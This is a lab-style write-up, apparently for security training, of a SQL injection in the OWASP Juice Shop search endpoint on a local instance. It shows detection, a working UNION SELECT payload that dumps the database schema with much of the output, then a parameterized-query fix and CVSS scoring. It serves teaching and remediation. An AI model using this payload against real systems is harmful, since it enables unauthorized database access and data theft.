## Version 1.4.1
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Injection
  Location:
    /search - Injection
  CWE:
    CWE-89: SQL Injection
  Rule:
    REQ.169: https://fluidattacks.com/web/rules/169/
  Goal:
    Exfiltrate the entire DB schema definition via SQL Injection.
  Recommendation:
    Set users' access permissions

  Background:
  Hacker's software:
    | <Software name> | <Version>       |
    | Kali Linux      | 2020            |
    | Firefox Quantum | 68.7.0esr       |
    | Burpsuite       | 2020.4          |

  TOE information:
    Given I am running Juice-Shop locally at
    """
    https://localhost:3000/#/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I access https://localhost:3000/#/search
    Then I see the site
    And I can search for items in the store

  Scenario: Static detection
  SQL Injection
    Given I access the site
    Then I tried to search for an item (banana)
    """
    https://localhost:3000/#/search?q=banana
    """
    And The app show the results normally
    Then I tried to search "';"
    """
    https://localhost:3000/#/search?q=';
    """
    And It redirects to a error page
    Then I found the paramenter q is vulnerable to sql injection

  Scenario: Dynamic detection
  SQL Injection
    Given The search page https://localhost:3000/#/search
    Then I intercepted the traffic of the page using burp
    And I see the GET request when search an item on the page
    """
    ET /search?q=orange HTTP/1.1
    Host: 192.168.1.65:3000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
    Firefox/68.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: io=6XFBvfKDcvbIZwdAAAAO; language=en;
    welcomebanner_status=dismiss;
    cookieconsent_status=dismiss
    Upgrade-Insecure-Requests: 1
    If-Modified-Since: Mon, 27 Jul 2020 17:37:44 GMT
    If-None-Match: W/"785-173915a0ded"
    Cache-Control: max-age=0
    """
    Then I got the response
    """
    {"status":"success",
    "data":[{"id":2,"name":
    "Orange Juice (1000ml)",
    "description":"Made from oranges hand-picked by Uncle Dittmeyer.",
    "price":2.99,"deluxePrice":2.49,"image":"orange_juice.jpg",
    "createdAt":"2020-07-27 21:38:49.360 +00:00",
    "updatedAt":"2020-07-27 21:38:49.360 +00:00",
    "deletedAt":null}]}
    """
    Then Go the Repeater tool and change the value for q parameter to "';"
    Then I got the response
    """
    {
      "error": {
        "message": "SQLITE_ERROR: near \";\": syntax error",
        "stack": "SequelizeDatabaseError: SQLITE_ERROR: near \";\":
        syntax error\n    at Query.formatError
        (/home/paola/git/juice-shop/node_modules/sequelize/lib/dialects/
        sqlite/query.js:422:16)\n    at Query._handleQueryResponse
        (/home/paola/git/juice-shop/node_modules/sequelize/lib/dialects/
        sqlite/query.js:73:18)\n
        at afterExecute (/home/paola/git/juice-shop/node_modules/sequelize/
        lib/dialects/sqlite/query.js:250:31)\n    at replacement
        (/home/paola/git/juice-shop/node_modules/sqlite3/lib/trace.js:19:31)\n
        at Statement.errBack (/home/paola/git/juice-shop/node_modules/sqlite3/
        lib/sqlite3.js:14:21)",
        "name": "SequelizeDatabaseError",
        "parent": {
          "errno": 1,
          "code": "SQLITE_ERROR",
          "sql": "SELECT * FROM Products WHERE ((name LIKE '%';%' OR
          description LIKE '%';%') AND deletedAt IS NULL) ORDER BY name"
        },
        "original": {
          "errno": 1,
          "code": "SQLITE_ERROR",
          "sql": "SELECT * FROM Products WHERE ((name LIKE '%';%' OR
          description LIKE '%';%') AND deletedAt IS NULL) ORDER BY name"
        },
        "sql": "SELECT * FROM Products WHERE ((name LIKE '%';%' OR description
        LIKE '%';%') AND deletedAt IS NULL) ORDER BY name"
      }
    }
    """
    And I can see that the q parameter is vulnerable to sql injection

  Scenario: Exploitation
  SQL injection
    Given I have identified a vulnearble parameter
    Then I can sed sql commands to extract information about the database
    Then I send the query
    """
    qwert')) UNION SELECT sql, '2', '3', '4', '5', '6', '7', '8', '9'
    FROM sqlite_master--
    """
    And I can see all the database information
    """
    {"status":"success",
    "data":[{"id":null,"name":"2",
    "description":"3","price":"4",
    "deluxePrice":"5","image":"6",
    "createdAt":"7",
    "updatedAt":"8",
    "deletedAt":"9"},

    {"id":"CREATE TABLE `Addresses` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `fullName` VARCHAR(255), `mobileNum` INTEGER, `zipCode` VARCHAR(255),
    `streetAddress` VARCHAR(255), `city` VARCHAR(255), `state` VARCHAR(255),
    `country` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt`
    DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE
    SET NULL ON UPDATE CASCADE)","name":"2","description":"3","price":"4",
    "deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8",
    "deletedAt":"9"},{"id":"CREATE TABLE `BasketItems`
    (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER, `createdAt`
    DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `BasketId` INTEGER
    REFERENCES `Baskets` (`id`) ON DELETE CASCADE ON UPDATE CASCADE,
    `ProductId` INTEGER REFERENCES `Products` (`id`) ON DELETE CASCADE ON
    UPDATE CASCADE, UNIQUE (`BasketId`, `ProductId`))","name":"2",
    "description":"3","price":"4","deluxePrice":"5","image":"6",
    "createdAt":"7","updatedAt":"8","deletedAt":"9"},

    {"id":"CREATE TABLE `Baskets` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `coupon` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt`
    DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE
    SET NULL ON UPDATE CASCADE)","name":"2","description":"3","price":"4",
    "deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8"
    "deletedAt":"9"},

    {"id":"CREATE TABLE `Captchas` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `captchaId` INTEGER, `captcha` VARCHAR(255), `answer` VARCHAR(255),
    `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL)",
    "name":"2","description":"3","price":"4","deluxePrice":"5","image":"6",
    "createdAt":"7","updatedAt":"8","deletedAt":"9"},

    {"id":"CREATE TABLE `Cards` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `fullName` VARCHAR(255), `cardNum` INTEGER, `expMonth` INTEGER, `expYear`
    INTEGER, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL,
    `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE
    CASCADE)","name":"2","description":"3","price":"4","deluxePrice":"5",
    "image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},

    {"id":"CREATE TABLE `Challenges` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `key` VARCHAR(255), `name` VARCHAR(255), `category` VARCHAR(255),
    `description` VARCHAR(255), `difficulty` INTEGER, `hint` VARCHAR(255),
    `hintUrl` VARCHAR(255), `solved` TINYINT(1), `disabledEnv` VARCHAR(255),
    `tutorialOrder` NUMBER, `createdAt` DATETIME NOT NULL, `updatedAt`
    DATETIME NOT NULL)","name":"2","description":"3","price":"4",
    "deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8",
    "deletedAt":"9"},{"id":"CREATE TABLE `Complaints` (`id` INTEGER PRIMARY KEY
    AUTOINCREMENT, `message` VARCHAR(255), `file` VARCHAR(255), `createdAt`
    DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER
    REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)",
    "name":"2","description":"3","price":"4","deluxePrice":"5","image":"6",
    "createdAt":"7","updatedAt":"8","deletedAt":"9"},

    {"id":"CREATE TABLE `Deliveries` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `name` VARCHAR(255), `price` FLOAT, `deluxePrice` FLOAT, `eta` FLOAT,
    `icon` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt`
    DATETIME NOT NULL)","name":"2","description":"3","price":"4",
    "deluxePrice":"5","image":"6","createdAt":"7","updatedAt":"8",
    "deletedAt":"9"},

    {"id":"CREATE TABLE `Feedbacks` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,
    `comment` VARCHAR(255), `rating` INTEGER NOT NULL, `createdAt`
    DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER
    REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)",
    "name":"2","description":"3","price":"4","deluxePrice":"5",
    "image":"6","createdAt":"7","updatedAt":"8","deletedAt":"9"},

    {"id":"CREATE TABLE `ImageCaptchas` (`id` INTEGER PRIMARY KEY
    AUTOINCREMENT, `image` VARCHAR(255), `answer` VARCHAR(255),
    `UserId` INTEGER REFERENCES`Users` (`id`) ON DELETE NO ACTION ON UPDATE
    CASCADE, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL)",
    "name":"2","description":"3", "price":"4","deluxePrice":"5","image":"6",
    "createdAt":"7","updatedAt":"8","deletedAt":"9"},
    """
    And I can see the complete database schema including all tables and indices

  Scenario: Remediation
  Parameterized query
    Given I see the code at "/route/search.js"
    """
    return (req, res, next) => {
    let criteria = req.query.q === 'undefined' ? '' : req.query.q || ''
    criteria = (criteria.length <= 200) ? criteria : criteria.substring(0, 200)
    models.sequelize.query(`SELECT * FROM Products
    WHERE ((name LIKE '%${criteria}%' OR description
    LIKE '%${criteria}%') AND deletedAt IS NULL) ORDER BY name`)
      .then(([products]) => {
        const dataString = JSON.stringify(products)
    """
    Then I see the query to search products
    Then I modified the code like this
    """
    return (req, res, next) => {
    let criteria = req.query.q === 'undefined' ? '' : req.query.q || ''
    criteria = (criteria.length <= 200) ? criteria : criteria.substring(0, 200)
    models.sequelize.query(`SELECT * FROM Products WHERE ((name LIKE :item
    OR description
    LIKE :item) AND deletedAt IS NULL) ORDER BY name`,{
    replacements: { item: '%'+ criteria + '%' }})
    """
    And In this way is not possible sql injection


  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    10/10 (Critical) - /AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.3/10 (Critical) - /E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    9.3/10 (Critical) - /CR:H/IR:M/AR:L


  Scenario: Correlations
    No correlations have been found to this date {2020-07-28}
